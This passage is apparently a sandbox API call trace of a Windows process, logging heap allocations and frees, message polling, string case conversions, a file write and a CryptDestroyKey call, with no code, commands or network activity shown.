lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0087.885] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0087.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0087.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0087.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0087.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0087.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0087.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0087.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0087.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73980 [0087.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9eb0 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e68 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9cd0 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c58 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73980 | out: hHeap=0x2af0000) returned 1 [0087.890] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f68 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.890] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0087.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0087.890] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0087.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74088 [0087.891] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0087.891] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0087.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0087.891] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0087.891] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74088 | out: hHeap=0x2af0000) returned 1 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0087.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0087.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0087.892] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0087.892] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d1ea8 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0087.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0087.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0087.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f70 | out: hHeap=0x2af0000) returned 1 [0087.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69670 | out: hHeap=0x2af0000) returned 1 [0087.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.897] WriteFile (in: hFile=0x2c4, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0x8f28, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0x8f28, lpOverlapped=0x0) returned 1 [0087.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.899] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0087.899] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.899] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0087.899] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.899] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.899] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.899] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0087.899] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.899] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0087.899] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0087.899] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa99d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0087.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.900] CryptDestroyKey (hKey=0x9a3ec0) returned 1 [0087.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.900] RtlAllocateHeap 